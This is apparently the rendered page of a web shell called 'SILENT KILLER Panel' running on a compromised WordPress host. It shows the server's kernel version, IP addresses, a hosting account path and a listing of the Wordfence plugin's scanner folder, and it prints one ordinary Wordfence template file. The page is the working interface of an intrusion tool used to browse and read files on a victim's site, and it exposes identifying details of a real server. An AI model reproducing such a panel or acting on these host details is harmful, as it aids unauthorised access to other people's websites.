SILENT KILLERPanel

Current Path: > home > transcarter > public_html > wp-content > > plugins > wordfence > > views > scanner >


Operation   : Linux host59.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Software     : Apache
Server IP    : 198.54.126.42 | Your IP: 216.73.216.135
Domains      : 1034 Domain(s)
Permission   : [ 0755 ]

Files and Folders in: /home/transcarter/public_html/wp-content//plugins/wordfence//views/scanner/

NameTypeSizeLast ModifiedActions
issue-base.php File 8695 bytes July 17 2025 21:05:48.
issue-checkGSB.php File 2467 bytes July 17 2025 21:05:48.
issue-checkHowGetIPs.php File 1553 bytes July 17 2025 21:05:48.
issue-checkSpamIP.php File 1341 bytes July 17 2025 21:05:48.
issue-commentBadURL.php File 3168 bytes July 17 2025 21:05:48.
issue-configReadable.php File 2082 bytes July 17 2025 21:05:48.
issue-control-edit-comment.php File 444 bytes July 17 2025 21:05:48.
issue-control-edit-post.php File 622 bytes July 17 2025 21:05:48.
issue-control-edit-user.php File 1120 bytes July 17 2025 21:05:48.
issue-control-hide-file.php File 2780 bytes July 17 2025 21:05:48.
issue-control-ignore.php File 2185 bytes July 17 2025 21:05:48.
issue-control-repair.php File 916 bytes July 17 2025 21:05:48.
issue-control-show-details.php File 1989 bytes July 17 2025 21:05:48.
issue-coreUnknown.php File 2048 bytes July 17 2025 21:05:48.
issue-database.php File 2167 bytes July 17 2025 21:05:48.
issue-diskSpace.php File 1988 bytes July 17 2025 21:05:48.
issue-easyPassword.php File 2222 bytes July 17 2025 21:05:48.
issue-file.php File 3366 bytes July 17 2025 21:05:48.
issue-geoipSupport.php File 1858 bytes July 17 2025 21:05:48.
issue-knownfile.php File 3041 bytes July 17 2025 21:05:48.
issue-optionBadURL.php File 2115 bytes July 17 2025 21:05:48.
issue-postBadTitle.php File 2117 bytes July 17 2025 21:05:48.
issue-postBadURL.php File 3263 bytes July 17 2025 21:05:48.
issue-publiclyAccessible.php File 2065 bytes July 17 2025 21:05:48.
issue-skippedPaths.php File 1737 bytes July 17 2025 21:05:48.
issue-spamvertizeCheck.php File 1346 bytes July 17 2025 21:05:48.
issue-suspiciousAdminUsers.php File 2294 bytes July 17 2025 21:05:48.
issue-timelimit.php File 1852 bytes July 17 2025 21:05:48.
issue-wafStatus.php File 1984 bytes July 17 2025 21:05:48.
issue-wfPluginAbandoned.php File 3926 bytes July 17 2025 21:05:48.
issue-wfPluginRemoved.php File 3148 bytes July 17 2025 21:05:48.
issue-wfPluginUpgrade.php File 4089 bytes July 17 2025 21:05:48.
issue-wfPluginVulnerable.php File 3091 bytes July 17 2025 21:05:48.
issue-wfThemeUpgrade.php File 3666 bytes July 17 2025 21:05:48.
issue-wfUpgrade.php File 3607 bytes July 17 2025 21:05:48.
issue-wfUpgradeError.php File 1438 bytes July 17 2025 21:05:48.
issue-wpscan_directoryList.php File 2274 bytes July 17 2025 21:05:48.
issue-wpscan_fullPathDiscl.php File 2269 bytes July 17 2025 21:05:48.
no-issues.php File 1134 bytes July 17 2025 21:05:48.
option-scan-signatures.php File 5990 bytes July 17 2025 21:05:48.
options-group-advanced.php File 3713 bytes July 17 2025 21:05:48.
options-group-basic.php File 1413 bytes July 17 2025 21:05:48.
options-group-general.php File 8055 bytes July 17 2025 21:05:48.
options-group-performance.php File 4221 bytes July 17 2025 21:05:48.
options-group-scan-schedule.php File 1453 bytes July 17 2025 21:05:48.
scan-failed.php File 1802 bytes July 17 2025 21:05:48.
scan-progress-detailed.php File 2974 bytes July 17 2025 21:05:48.
scan-progress-element.php File 2066 bytes July 17 2025 21:05:48.
scan-progress.php File 2912 bytes July 17 2025 21:05:48.
scan-results.php File 8479 bytes July 17 2025 21:05:48.
scan-scheduling.php File 18100 bytes July 17 2025 21:05:48.
scan-starter.php File 1878 bytes July 17 2025 21:05:48.
scan-type.php File 9334 bytes July 17 2025 21:05:48.
scanner-status.php File 4079 bytes July 17 2025 21:05:48.
site-cleaning-beta-sigs.php File 8793 bytes July 17 2025 21:05:48.
site-cleaning-bottom.php File 2083 bytes July 17 2025 21:05:48.
site-cleaning-high-sense.php File 8795 bytes July 17 2025 21:05:48.
site-cleaning.php File 9336 bytes July 17 2025 21:05:48.

Reading File: /home/transcarter/public_html/wp-content//plugins/wordfence//views/scanner//scan-progress.php

<?php
if (!defined('WORDFENCE_VERSION')) { exit; }
/**
 * Presents a block list element specifically for the scan progress indicator.
 *
 * Expects $scanner.
 *
 * @var wfScanner $scanner The scanner state.
 */

$status = $scanner->stageStatus();
?>
<ul class="wf-scanner-progress">
	<?php
	echo wfView::create('scanner/scan-progress-element', array(
		'scanner' => $scanner,
		'id' => 'wf-scan-spamvertising',
		'title' => __('Spamvertising Checks', 'wordfence'),
		'status' => $status[wfScanner::STAGE_SPAMVERTISING_CHECKS],
	))->render();
	
	echo wfView::create('scanner/scan-progress-element', array(
		'scanner' => $scanner,
		'id' => 'wf-scan-spam',
		'title' => __('Spam Check', 'wordfence'),
		'status' => $status[wfScanner::STAGE_SPAM_CHECK],
	))->render();
	
	echo wfView::create('scanner/scan-progress-element', array(
		'scanner' => $scanner,
		'id' => 'wf-scan-blacklist',
		'title' => __('Blocklist Check', 'wordfence'),
		'status' => $status[wfScanner::STAGE_BLACKLIST_CHECK],
	))->render();
	
	echo wfView::create('scanner/scan-progress-element', array(
		'scanner' => $scanner,
		'id' => 'wf-scan-server',
		'title' => __('Server State', 'wordfence'),
		'status' => $status[wfScanner::STAGE_SERVER_STATE],
	))->render();
	
	echo wfView::create('scanner/scan-progress-element', array(
		'scanner' => $scanner,
		'id' => 'wf-scan-changes',
		'title' => __('File Changes', 'wordfence'),
		'status' => $status[wfScanner::STAGE_FILE_CHANGES],
	))->render();
	
	echo wfView::create('scanner/scan-progress-element', array(
		'scanner' => $scanner,
		'id' => 'wf-scan-malware',
		'title' => __('Malware Scan', 'wordfence'),
		'status' => $status[wfScanner::STAGE_MALWARE_SCAN],
	))->render();
	
	echo wfView::create('scanner/scan-progress-element', array(
		'scanner' => $scanner,
		'id' => 'wf-scan-content',
		'title' => __('Content Safety', 'wordfence'),
		'status' => $status[wfScanner::STAGE_CONTENT_SAFETY],
	))->render();
	
	echo wfView::create('scanner/scan-progress-element', array(
		'scanner' => $scanner,
		'id' => 'wf-scan-public',
		'title' => __('Public Files', 'wordfence'),
		'status' => $status[wfScanner::STAGE_PUBLIC_FILES],
	))->render();
	
	echo wfView::create('scanner/scan-progress-element', array(
		'scanner' => $scanner,
		'id' => 'wf-scan-password',
		'title' => __('Password Strength', 'wordfence'),
		'status' => $status[wfScanner::STAGE_PASSWORD_STRENGTH],
	))->render();
	
	echo wfView::create('scanner/scan-progress-element', array(
		'scanner' => $scanner,
		'id' => 'wf-scan-vulnerability',
		'title' => __('Vulnerability Scan', 'wordfence'),
		'status' => $status[wfScanner::STAGE_VULNERABILITY_SCAN],
	))->render();
	
	echo wfView::create('scanner/scan-progress-element', array(
		'scanner' => $scanner,
		'id' => 'wf-scan-options',
		'title' => __('User & Option Audit', 'wordfence'),
		'status' => $status[wfScanner::STAGE_OPTIONS_AUDIT],
	))->render();
	?>
</ul>

SILENT KILLER Tool